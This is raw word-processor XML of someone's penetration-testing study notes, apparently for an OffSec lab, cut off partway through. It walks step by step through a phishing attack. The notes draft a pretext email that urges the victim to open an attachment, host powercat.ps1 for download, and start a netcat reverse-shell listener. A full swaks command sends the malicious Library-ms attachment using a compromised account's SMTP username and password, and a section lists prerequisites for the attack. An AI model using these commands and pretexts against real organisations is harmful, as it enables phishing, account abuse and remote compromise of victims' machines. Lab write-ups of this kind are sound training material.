        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then also create body for the email inside of file called</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> body.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inside of webdav directory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002708">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hey!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002709">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure body.txt, the shortcut, and config.Library-ms are all inside of /home/kali/webdav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the powercat.ps1 file on port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002710">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002711">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener for rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002712">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002713">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run swaks, which sends the mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo swaks -t </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jim@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">maildmz@relia.com</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --attach </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@config.Library-ms</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.158.189</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --body </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@body.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--header "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject: test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" --suppress-data -ap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002715">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: this is the receiver of mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002716">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : this is who is sending the mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002717">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.158.189 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the machine with the all the mailing ports. It's the target machine of the attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002718">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--suppress-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to summarize information regarding the SMTP transactions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002719">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enable password authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will ask for username and password. This is used for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logging into SMTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: maildmz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: DPuBT9tGCBrTb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These creds must be allowed to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send mail via the target SMTP server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output should look something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4306908" cy="3927293"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="481" name="image468.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image468.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId811"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4306908" cy="3927293"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002720">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plus you should look at your powercat listener and see if the target machine tried download it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then wait for like 30 seconds on listener!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002722">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002723">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002724">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tgpk2rx7x4sh" w:id="343"/>
      <w:bookmarkEnd w:id="343"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prerequisites for this phishing attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002725">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002726">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports Required (Essential)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002727">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You sent the phishing email using the tool swaks, which requires access to an SMTP server that accepts authentication and allows you to send as the compromised user (maildmz@relia.com).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002728">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If AUTH LOGIN isn’t there you can still do the attack as long as the server accepts mail without authentication which many do for inbound mail to their domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002729">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since you didn't specify port in Swaks, it likely defaulted to port 25 which had AUTH LOGIN so that meant you can login using username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And someone from offsec discord also said that it's required the target mailing machine needed to be MX (Mail Exchange) for the target domain. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To check who is the MX for your domain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000272F">
      <w:pPr>
        <w:numPr>
